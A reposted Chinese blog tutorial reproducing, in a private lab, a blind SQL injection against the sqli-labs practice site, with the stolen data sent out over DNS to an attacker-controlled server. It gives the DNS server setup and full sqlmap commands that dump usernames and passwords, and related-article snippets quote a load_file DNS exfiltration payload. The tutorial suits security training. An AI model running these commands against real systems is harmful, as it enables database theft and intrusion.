【sql注入】sqlmap+DNSlog外带数据 注入复现

最新推荐文章于 2024-03-18 00:36:47 发布
最新推荐文章于 2024-03-18 00:36:47 发布
阅读量1.8k 收藏 4
点赞数
分类专栏: Web攻防 文章标签: mysql 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/C_LCH_2000/article/details/126432396
版权

原文地址

【sql注入】sqlmap+DNSlog外带数据 注入复现 – Yoyo&Kiki's Blog (mylovekiki.top)

DNSlog注入

dnslog注入原理通过子查询,将内容拼接到域名内,查询相应的dns解析记录,来获取我们想要的数据

利用场景

在sql注入为布尔盲注、时间盲注时,如果遇到大量的数据,注入的效率将十分低下且耗时,用sqlmap还容易被waf拦截,IP被ban,这种情况就可用利用内置文件读取函数 load_file()来完成 DNSlog注入

MySql配置条件

配置文件 my.ini 中 secure_file_priv 需为空

  • secure_file_priv为空,可以读取磁盘的目录;
  • secure_file_priv为路径,可以读取路径中的文件;
  • secure_file_priv为null,load_file则不能加载文件。

复现

实验环境:

Windows Server 2008 R2(DNS服务器)IP:192.168.0.107

Kali(sqlmap)IP:192.168.0.108

Win11(靶机)IP:192.168.0.105

环境搭建

DNS服务器搭建

进入Windows Server 2008 R2 服务器管理器,新建新建角色,选择DNS服务器

然后新建一个正向查找区域,选择区域类型为主要区域,命名 changan.top

然后就下一步下一步完成。

右键查看服务器属性,高级,取消勾选 禁用递归,

在监视中,勾选下图的两个测试类型

然后右键changan.top 新建l主机A记录,一个名称 ns1,IP为kali(sqlmap)地址 192.168.0.108,作为域的DNS服务器;另一个名称 *(泛解析),IP为kali(sqlmap)地址 192.168.0.108,匹配所有子域名

测试

来到win11物理机,修改DNS服务器为刚才搭建的DNS服务器(Win Service 2008R2),IP 192.168.0.107

接下来测试,查看能否解析到kali

先在kali开启53端口监听

然后在Win11物理机ping我们搭建的DNS服务器,可见可以连接,且kali可以收到并转发

现在,我们Win11物理机的所有数据,都将交给搭建的DNS服务器,然后中转给kali

添加转发

新建一个条件转发器,DNS域为 shanxi.top,IP为kali 192.168.0.108(不用理会验证超时)

物理机ping test.changan.top 能通,kali有显示即可

注入复现

sqlmap+DNSlog 外带参数 –dns-domain参数注入

–dns-domain参数为条件转发器中设置的域名:shanxi.top

爆库

sqlmap -u “http://192.168.0.105/sqli-labs-master/less-8/index.php/?id=1” –technique=T –dns-domain “shanxi.top” –dbs

库名security

爆表

sqlmap -u “http://192.168.0.105/sqli-labs-master/less-8/index.php/?id=1” –technique=T –dns-domain “shanxi.top” -D security –tables

爆字段名

sqlmap -u “192.168.0.105/sqli-labs-master/less-8/?id=1” –technique=T –dns-domain “shanxi.top” -D security -T users –columns

爆数据

sqlmap -u “192.168.0.105/sqli-labs-master/less-8/?id=1” –technique=T –dns-domain “shanxi.top” -D security -T users -C username,password –dump

搞定!

比布尔、时间盲注快不少!

树迷了路
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用sqlmap+burpsuite进行中级sql注入
06-01
使用sqlmap+burpsuite进行中级sql注入,亲测可行
sql注入利用dnslog外带数据快速注入
weixin_56023251的博客
08-08 1913
sql注入时为布尔盲注、时间盲注,注入的效率低且线程高容易被waf拦截,又或者是目标站点没有回显,我们在读取文件、执行命令注入等操作时无法明显的确认是否利用成功,这时候就要用到我们的DNSlog注入Dns在域名解析时会留下域名和解析ip的记录,利用这点我们可以使用Dnslog(日志)记录显示我们的注入结果。mysql读入文件时 首先需要将secure_file_priv的默认值为null ,只需要在my.ini修改secure_file_priv=''2.开启了LOAD_FILE() 读取文件的函数。.
DNSlog外带数据注入
C_LCH_2000的博客
08-04 1383
盲注代替 DNS logDNS日志,域名解析的记录。
DNSLog注入SQLmap工具使用
最新发布
2301_80034711的博客
03-18 821
DNSLog就是储存在DNS上的域名相关的信息,它可以记录我们对域名或者IP的访问信息,类似一个日志文件。比如说现在有一个xxx.aaa.com的域名(从右到左分别为顶级域名、二级域名、三级域名),将其域名设置对应的ip1.1.1.1我们向dns服务器发起aaa.com的解析请求时,DNSlog就会记录下对aaa.com的解析,那么解析值就为1.1.1.1,这样被记录下来的过程就是DNSLogSqlmap是一个使用python语言开发的开源的渗透测试工具,可以利用SQL注入漏洞,获取数据服务器的权限。
sqlmap结合dnslog外带注入
newlife1441的博客
08-05 598
目录📓前言📓操作步骤1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置2.环境准备2.1Windows server2008 2.1.1搭建dns服务器2.2测试2.2.1设置靶机的网络的dns为server20082.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看 2.2.3server2008中创建转发器2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况2.3开始sqlmap使用dnslog外带注入2.3...
SQL注入之利用DNSlog外带盲注回显
baynk的博客
03-31 5732
0x00 SQL盲注 当我们发现一个站点存在一个没有数据回显的注入点进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而且很容易被网站BAN掉IP,虽然也可以使用代理IP池,但是还是需要一种快速有效的方法来获取数据。 此时我们就可以利用DNSlog来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF中利用。 0x01 DNSlog利用条件 DBMS中需要有可...
mysql dns注入_SQL 注入-DNS 外带数据
weixin_35123047的博客
02-07 268
参考文章注:外带数据皆为数据库版本信息mysql条件:Windowsmysql.ini 中 secure_file_priv 必须为空,select @@secure_file_priv适用于联合注入或堆叠注入具体:利用 mysql (Windows 适用)中的 load_file() 函数select load_file(concat("\\\\",version(),".1ndex.dnslo...
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
sql注入工具sqlmap源代码+常用指令
04-09
SQLMap是一款流行的开源SQL注入工具,用于自动化检测和利用Web应用程序中的SQL注入漏洞。它可以测试目标站点是否存在SQL注入漏洞,并探测数据库类型、操作系统、表名、列名等信息,进而将这些信息自动化地利用来获取...
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
sql注入攻击之sqlmap
06-10
手工进行sql注入对于初学者有一定的难度,本节课程针对于信息安全小白讲解怎么使用sqlmap来进行sql注入,结合前面章节将的内容可以的判断互联网上网站是否存在sql注入
DNS外带注入SQLMAP
qq_31088019的博客
08-06 540
dns外带数据
SQL注入 - Part 3(带外)
捡破烂日记^ ^
05-23 651
本篇主要是思路概述(sql注入新思路+waf)
sqlmap+dnslog注入复现
qq_50646296的博客
08-07 993
2.准备两台虚拟机,一台为Kali(作为攻击机)另一台使用Windows server2008 R2(作为DNS服务器),使用本地物理机作为肉机。编辑本地肉机的dns设置,改为手动,首选DNS写windows server2008 的IP地址。查看secure_file_priv 是否为空值,如果是NULL,需要将其改为空。2 不存在,则在[mysqld]下,新增secure_file_priv=""。然后添加A记录,一条ns,作为域dns服务器,一条*匹配所有子域。配置DNS服务器ip信息和dns信息。.
SQL注入(Dns注入)---zkaq
weixin_38237216的博客
04-11 1756
1.概念 1.DNS-log:DNS是解析域名的,log是日志记录,DNS-log是记录域名解析记录日志 2.使用场景:在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 3.涉及的函数:LOAD_FILE():读取文件的函数—读取文件并返回文件内容为字符串 ​ a.配置文件中的参数secure_file_priv= ​ b.高版本mysql中会限制 ​ c.既然会被限制那有什么用呢?但是也会存在下面几种情况 有的版本会自动开启 有的网站需要
sqlmap + dnslog外带数据
CYLK1987310466的博客
08-06 984
sqlmap dnslog外带数据
sql注入dns带外通信实践】
qq_40646572的博客
05-29 868
带外通信技术,通常使用在无法直接利用漏洞获得回显的,但目标确实存在漏洞的情况下使用,通过DNS请求就可以把想获得的数据外带出来。 带外通信使用在sql注入的条件如下: 部分文章介绍带外通信时,提及需要设置 secure_auth=ON并且secure_file_priv=’‘。但我在环境实现时发现,只需要设置下secure_file_priv=’‘即可,当然可能时因为版本的问题。我使用的mysql版本如下: 使用的dnslog是用的ceye平台的,自己个人资料中的标识符中的地址就是dns回显地址。 h
数据外带——DNS注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-14 1112
Mysql注入——DNS注入 靶场地址 原理:利用UNC路径去访问服务器dns会有日志,通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志 1.,我们看到靶场,首先尝试最简单的get传参,注入 它是直接将id传参拼接进去,然后用mysqli_connect()函数进行针对数据库的查询,我们顺理成章再后面输入内容?id=1进行测试 页面正常,继续
SQL注入——DNSlog手动注入
heyingcheng的博客
03-11 343
手动注入对waf的绕过有很大的帮助,但是效率比较低。DNSlog手动注入的条件和文件上传注入一样,也需要mysql有文件的读写权限。
sql注入sqlmap
11-11
SQL注入是一种常见的Web应用程序漏洞,攻击者可以利用这种漏洞来获取敏感信息或者执行未经授权的操作。而Sqlmap是一款开源的自动化SQL注入工具,可以帮助安全测试人员快速检测和利用SQL注入漏洞。以下是使用Sqlmap进行SQL注入检测的步骤: 1. 确认目标网站存在SQL注入漏洞,可以通过手工注入或者使用Sqlmap进行检测。 2. 下载并安装Sqlmap,可以从官网(https://sqlmap.org/)下载最新版本。 3. 打开命令行窗口,进入Sqlmap所在的目录。 4. 输入以下命令进行基本格式的检测: ``` sqlmap -u "http://www.vuln.cn/post.php?id=1" ``` 其中,-u参数指定目标URL,id=1表示注入点的参数为id。 5. 如果需要指定数据库类型和检测级别,可以使用--dbms和--level参数,例如: ``` sqlmap -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --level 3 ``` 其中,--dbms参数指定数据库类型为mysql,--level参数指定检测级别为3。 6. 如果目标网站存在302跳转,可以使用--follow-redirects参数进行跟随,例如: ``` sqlmap -u "http://www.vuln.cn/post.php?id=1" --follow-redirects ``` 7. Sqlmap会自动检测注入点的类型,并尝试利用不同的注入技术进行攻击,如果成功,会输出相应的结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值